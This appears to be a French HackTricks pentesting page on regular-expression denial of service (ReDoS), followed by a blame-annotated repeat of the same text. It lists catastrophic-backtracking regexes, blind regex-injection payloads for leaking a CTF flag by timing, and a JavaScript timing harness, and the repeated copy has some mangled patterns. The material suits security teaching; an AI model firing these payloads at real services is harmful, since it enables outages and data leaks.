hacktricks/pentesting-web/regular-expression-denial-of-service-redos.md

# Déni de service par expression régulière - ReDoS

<details>

<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>

Autres façons de soutenir HackTricks :

* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.

</details>

# Déni de service par expression régulière (ReDoS)

Un **Déni de service par expression régulière (ReDoS)** se produit lorsqu'une personne exploite les faiblesses de fonctionnement des expressions régulières (une méthode de recherche et de correspondance de motifs dans du texte). Parfois, lors de l'utilisation d'expressions régulières, elles peuvent devenir très lentes, surtout si le morceau de texte avec lequel elles travaillent devient plus grand. Cette lenteur peut devenir si importante qu'elle augmente très rapidement même avec de petites augmentations de la taille du texte. Les attaquants peuvent utiliser ce problème pour faire en sorte qu'un programme utilisant des expressions régulières cesse de fonctionner correctement pendant longtemps.


## L'algorithme naïf de regex problématique

**Consultez les détails sur [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**


## Regex malveillantes <a href="#evil-regexes" id="evil-regexes"></a>

Un motif d'expression régulière malveillant est celui qui peut **rester bloqué sur une entrée fabriquée provoquant un DoS**. Les motifs de regex malveillants contiennent généralement des regroupements avec répétition et répétition ou alternance avec chevauchement à l'intérieur du groupe répété. Quelques exemples de motifs malveillants incluent :

* (a+)+
* ([a-zA-Z]+)*
* (a|aa)+
* (a|a?)+
* (.*a){x} pour x > 10

Tous ceux-ci sont vulnérables à l'entrée `aaaaaaaaaaaaaaaaaaaaaaaa!`.

## Charges utiles ReDoS

### Exfiltration de chaîne via ReDoS

Dans un CTF (ou une prime de bug), peut-être que vous **contrôlez l'expression régulière avec laquelle une information sensible (le drapeau) est mise en correspondance**. Ensuite, il peut être utile de **faire geler la page (délai d'attente ou temps de traitement plus long)** si une **Regex correspond** et **pas si elle ne le fait pas**. De cette façon, vous pourrez **exfiltrer** la chaîne **caractère par caractère** :

* Dans [**ce post**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) vous pouvez trouver cette règle ReDoS : `^(?=<flag>)((.*)*)*salt$`
* Exemple : `^(?=HTB{sOmE_fl§N§)((.*)*)*salt$`
* Dans [**ce writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) vous pouvez trouver celle-ci : `<flag>(((((((.*)*)*)*)*)*)*)!`
* Dans [**ce writeup**](https://ctftime.org/writeup/25869) il a utilisé : `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$`

### Contrôle de l'entrée et de l'expression régulière ReDoS

Les exemples suivants sont des exemples de **ReDoS** où vous **contrôlez à la fois l'entrée** et la **regex** :
```javascript
function check_time_regexp(regexp, text){
var t0 = new Date().getTime();;
new RegExp(regexp).test(text);
var t1 = new Date().getTime();;
console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")
}

// This payloads work because the input has several "a"s
[
//  "((a+)+)+$",  //Eternal,
//  "(a?){100}$", //Eternal
"(a|a?)+$",
"(\\w*)+$",   //Generic
"(a*)+$",
"(.*a){100}$",
"([a-zA-Z]+)*$", //Generic
"(a+)*$",
].forEach(regexp => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))

/*
Regexp (a|a?)+$ took 5076 milliseconds.
Regexp (\w*)+$ took 3198 milliseconds.
Regexp (a*)+$ took 3281 milliseconds.
Regexp (.*a){100}$ took 1436 milliseconds.
Regexp ([a-zA-Z]+)*$ took 773 milliseconds.
Regexp (a+)*$ took 723 milliseconds.
*/
```
## Outils

* [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit)
* [https://devina.io/redos-checker](https://devina.io/redos-checker)

## Références
* [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
* [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets)
* [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html)
* [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869)

<details>

<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Autres façons de soutenir HackTricks:

* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.

</details>
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:11:01 +00:00			`# Déni de service par expression régulière - ReDoS`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`Autres façons de soutenir HackTricks :`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`* Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les [PLANS D'ABONNEMENT](https://github.com/sponsors/carlospolop) !`
			`* Obtenez le [swag officiel PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Découvrez [La famille PEASS](https://opensea.io/collection/the-peass-family), notre collection exclusive de [NFTs](https://opensea.io/collection/the-peass-family)`
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:11:01 +00:00			`* Rejoignez le 💬 [groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe Telegram](https://t.me/peass) ou suivez-nous sur Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`* Partagez vos astuces de piratage en soumettant des PR aux [HackTricks](https://github.com/carlospolop/hacktricks) et [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:11:01 +00:00			`# Déni de service par expression régulière (ReDoS)`
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:11:01 +00:00			Un Déni de service par expression régulière (ReDoS) se produit lorsqu'une personne exploite les faiblesses de fonctionnement des expressions régulières (une méthode de recherche et de correspondance de motifs dans du texte). Parfois, lors de l'utilisation d'expressions régulières, elles peuvent devenir très lentes, surtout si le morceau de texte avec lequel elles travaillent devient plus grand. Cette lenteur peut devenir si importante qu'elle augmente très rapidement même avec de petites augmentations de la taille du texte. Les attaquants peuvent utiliser ce problème pour faire en sorte qu'un programme utilisant des expressions régulières cesse de fonctionner correctement pendant longtemps.
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:11:01 +00:00			`## L'algorithme naïf de regex problématique`
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 17:01:50 +00:00			`Consultez les détails sur [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)`
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00

Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:11:01 +00:00			`## Regex malveillantes <a href="#evil-regexes" id="evil-regexes"></a>`
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:11:01 +00:00			`Un motif d'expression régulière malveillant est celui qui peut rester bloqué sur une entrée fabriquée provoquant un DoS. Les motifs de regex malveillants contiennent généralement des regroupements avec répétition et répétition ou alternance avec chevauchement à l'intérieur du groupe répété. Quelques exemples de motifs malveillants incluent :`
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 17:01:50 +00:00			`* (a+)+`
			`* ([a-zA-Z]+)*`
			`* (a\|aa)+`
			`* (a\|a?)+`
			`* (.*a){x} pour x > 10`
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			Tous ceux-ci sont vulnérables à l'entrée `aaaaaaaaaaaaaaaaaaaaaaaa!`.
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`## Charges utiles ReDoS`
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`### Exfiltration de chaîne via ReDoS`
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:11:01 +00:00			`Dans un CTF (ou une prime de bug), peut-être que vous contrôlez l'expression régulière avec laquelle une information sensible (le drapeau) est mise en correspondance. Ensuite, il peut être utile de faire geler la page (délai d'attente ou temps de traitement plus long) si une Regex correspond et pas si elle ne le fait pas. De cette façon, vous pourrez exfiltrer la chaîne caractère par caractère :`
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 17:01:50 +00:00			* Dans [ce post](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) vous pouvez trouver cette règle ReDoS : `^(?=<flag>)((.))*salt$`
			* Exemple : `^(?=HTB{sOmE_fl§N§)((.))*salt$`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			* Dans [ce writeup](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) vous pouvez trouver celle-ci : `<flag>(((((((.))))))*)!`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 17:01:50 +00:00			* Dans [ce writeup](https://ctftime.org/writeup/25869) il a utilisé : `^(?=${flag_prefix})........!!!!$`
GitBook: [#3088] No subject 2022-04-05 22:13:36 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`### Contrôle de l'entrée et de l'expression régulière ReDoS`
GitBook: [#3088] No subject 2022-04-05 22:13:36 +00:00
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:11:01 +00:00			`Les exemples suivants sont des exemples de ReDoS où vous contrôlez à la fois l'entrée et la regex :`
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00			```javascript
			`function check_time_regexp(regexp, text){`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 17:01:50 +00:00			`var t0 = new Date().getTime();;`
			`new RegExp(regexp).test(text);`
			`var t1 = new Date().getTime();;`
			`console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")`
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00			`}`

GitBook: [#3088] No subject 2022-04-05 22:13:36 +00:00			`// This payloads work because the input has several "a"s`
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00			`[`
			`// "((a+)+)+$", //Eternal,`
			`// "(a?){100}$", //Eternal`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 17:01:50 +00:00			`"(a\|a?)+$",`
			`"(\\w*)+$", //Generic`
			`"(a*)+$",`
			`"(.*a){100}$",`
			`"([a-zA-Z]+)*$", //Generic`
			`"(a+)*$",`
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00			`].forEach(regexp => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))`

			`/*`
			`Regexp (a\|a?)+$ took 5076 milliseconds.`
			`Regexp (\w*)+$ took 3198 milliseconds.`
			`Regexp (a*)+$ took 3281 milliseconds.`
			`Regexp (.*a){100}$ took 1436 milliseconds.`
			`Regexp ([a-zA-Z]+)*$ took 773 milliseconds.`
			`Regexp (a+)*$ took 723 milliseconds.`
			`*/`
			```
Translated to French 2023-06-03 13:10:46 +00:00			`## Outils`
GitBook: [master] one page modified 2021-04-16 09:25:21 +00:00
GitBook: [#3128] No subject 2022-04-27 12:34:57 +00:00			`* [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit)`
			`* [https://devina.io/redos-checker](https://devina.io/redos-checker)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:11:01 +00:00			`## Références`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 17:01:50 +00:00			`* [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`* [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets)`
			`* [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html)`
			`* [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 17:01:50 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`Autres façons de soutenir HackTricks:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 17:01:50 +00:00			`* Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les [PLANS D'ABONNEMENT](https://github.com/sponsors/carlospolop)!`
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:03:56 +00:00			`* Obtenez le [swag officiel PEASS & HackTricks](https://peass.creator-spring.com)`
Translated ['mobile-pentesting/ios-pentesting/ios-protocol-handlers.md', 2024-02-09 08:11:01 +00:00			`* Découvrez [La famille PEASS](https://opensea.io/collection/the-peass-family), notre collection exclusive de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Rejoignez le 💬 [groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe Telegram](https://t.me/peass) ou suivez nous sur Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Partagez vos astuces de piratage en soumettant des PR aux [HackTricks](https://github.com/carlospolop/hacktricks) et [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`